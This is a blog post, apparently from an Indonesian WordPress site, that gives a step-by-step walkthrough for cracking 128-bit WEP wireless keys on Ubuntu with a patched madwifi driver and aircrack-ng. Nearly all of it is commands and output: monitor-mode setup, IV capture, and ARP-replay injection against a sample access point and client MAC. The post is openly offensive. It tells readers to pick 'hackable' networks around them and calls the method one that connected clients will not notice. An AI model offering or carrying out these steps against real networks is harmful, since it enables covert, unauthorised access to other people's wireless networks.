Hacking Di Linux

Musik By Koil : Aku Luka Aku Lupa


Hacking 128bit WEP with aircrack-ng using madwifi-ng driver
on Ubuntu Edgy Eft 6.10
1. Install madwifi-ng
ifconfig ath0 down
rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \; 2>/dev/null
find /lib/modules -name ‘wlan*’ -exec rm -v {} \; 2>/dev/null
svn checkout http://svn.madwifi.org/branches/madwifi-old/ madwifi-old
wget http://patches.aircrack-ng.org//madwifi-old-r1417.patch
cd madwifi-old
patch -Np1 -i ../madwifi-old-r1417.patch
make KERNELPATH=/usr/src/linux-
make install KERNELPATH=/usr/src/linux-
depmod -ae
Please reboot you box at first, sometimes madwifi-ng hangs after install. You get errors,
check the dmesg:
[17184021.008000] ath_hal: (AR5210, AR5211, AR5212, RF5111, RF5112,
RF2413, RF5413)
[17184021.008000] ath_rate_sample: disagrees about version of symbol
[17184021.008000] ath_rate_sample: Unknown symbol ieee80211_iterate_nodes
[17184021.008000] ath_rate_sample: disagrees about version of symbol

ieee80211_proc_vcreate[17184021.008000] ath_rate_sample: Unknown symbol ieee80211_proc_vcreate
[17184021.012000] ath_pci: Unknown symbol ath_rate_tx_complete
[17184021.012000] ath_pci: disagrees about version of symbol ieee80211_encap
[17184021.012000] ath_pci: Unknown symbol ieee80211_encap
To load the kernel module:
modprobe ath_pci
2. Install aircrack-ng
apt-get install aircrack-ng
3. Hack it!
At first we have to create a device in monitor mode:
root@lapos:~# wlanconfig ath1 create wlandev wifi0 wlanmode monitor ath1
root@lapos:~# ifconfig ath1 up
You have to check the possibly hackable wifi networks around you, use airodump-ng without -c
flag, just see around. If you find any wifi network which has enough clients on it nad the signal
strengt is enough good then run airodump-ng like this.
root@lapos:~# airodump-ng ath1 -w lol -c 8

It will catch IV-s from channel 8. Nice but this is to slow for 128bit WEP you need 1M Ivs. How we
can do faster?

aireplay-ng –arpreplay -b 00:07:40:FE:26:B2 -h 00:30:65:08:10:92 ath1
The b param is the attacked AP and the h param is one of the connected clients MAC.
Screen 2: Running airreply-ng
You have many chance to improve the speed of the hack but i wont show, this is the fastest
method which not so agressive and the clients will not recognise what is going on.
At last, you have to analyse and find the WEP key using the airodump-ng out put file.
(For 64bit long keys use -n64 switch in aircrack-ng)
Good luck!



Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google+

You are commenting using your Google+ account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )


Connecting to %s

%d blogger menyukai ini: